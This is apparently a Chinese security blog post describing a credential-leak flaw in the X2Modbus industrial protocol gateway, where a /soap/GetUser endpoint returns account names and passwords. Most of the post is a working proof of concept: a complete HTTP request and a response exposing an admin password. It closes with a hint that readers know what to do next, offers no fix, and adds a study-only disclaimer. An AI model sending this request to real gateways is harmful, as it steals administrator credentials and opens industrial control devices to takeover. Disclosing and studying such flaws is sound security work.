讯饶科技 X2Modbus 敏感信息泄露

讯饶科技 X2Modbus 敏感信息泄露

文章目录

漏洞描述

X2Modbus是一款功能很强大的协议转换网关, 这里的X代表各家不同

的通信协议,2是To的谐音表示转换,Modbus就是最终支持的标准协议

是Modbus协议。使得用户可以根据现场设备的通信协议进行配置,转成

标准的Modbus协议。在PC端仿真运行无误后,上传到硬件协议转换网

关。

在其中存在一个可以getuser的接口,其中就会泄露账号密码等信息

影响版本

不详

实现原理

通过调用getuser接口来获取账号密码信息,从而可以登录后台

漏洞复现

接口在/soap/GetUser构造请求数据包

yaml 复制代码
POST /soap/GetUser  HTTP/1.1
Host: 0.0.0.0
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Referer: http://0.0.0.0/login.html
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: language=zh-cn; username=admin1
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 58


<GetUser><User Name="admin" Password="admin"/></GetUser>

查看返回包

yaml 复制代码
HTTP/1.1 200 OK
Cache-Control: no-cache, no-store, must-revalidate
Content-Type: text/xml; charset=utf-8
Set-Cookie: language=zh-cn; username=admin1
Content-Length: 407
<soap:Body>
<GetUserResult>
<UserName>admin</UserName>
<PassWord>admin123456</PassWord>
<Purview>4</Purview>
</GetUserResult>
</soap:Body>
</soap:Envelope>

emmm这里就复现成功了,接下来师傅们懂得

修复建议

暂无

注: 文章只为学习交流安全技术,有人非法盈利后果自行承担

相关推荐
李白你好2 小时前
CVE-2025-2502 / CNVD-2025-16450 联想电脑管家权限提升漏洞
漏洞
网络研究院10 天前
Citrix 零日漏洞自五月起遭积极利用
网络·安全·漏洞·威胁
网络研究院19 天前
新的 SHAMOS MacOS 窃取程序利用单行终端命令攻击用户
macos·攻击·漏洞·用户
IT 青年23 天前
CVE-2014-6271(bash破壳漏洞 )
漏洞
网络研究院23 天前
新的“MadeYouReset”方法利用 HTTP/2 进行隐秘的 DoS 攻击
网络·网络协议·安全·http·攻击·漏洞
IT 青年1 个月前
CVE-2020-24557
漏洞
白帽程序员猫哥1 个月前
漏洞全讲解之中间件与框架漏洞(数字基础设施的“阿喀琉斯之踵“)
网络·安全·web安全·中间件·密码学·渗透
第十六年盛夏.1 个月前
【网络安全】不安全的反序列化漏洞
网络安全·漏洞
网安Ruler1 个月前
Web开发-PHP应用&原生语法&全局变量&数据接受&身份验证&变量覆盖&任意上传(代码审计案例)
网络·安全·网络安全·渗透·红队
网安Ruler1 个月前
Web开发-PHP应用&Cookie脆弱&Session固定&Token唯一&身份验证&数据库通讯
前端·数据库·网络安全·php·渗透·红队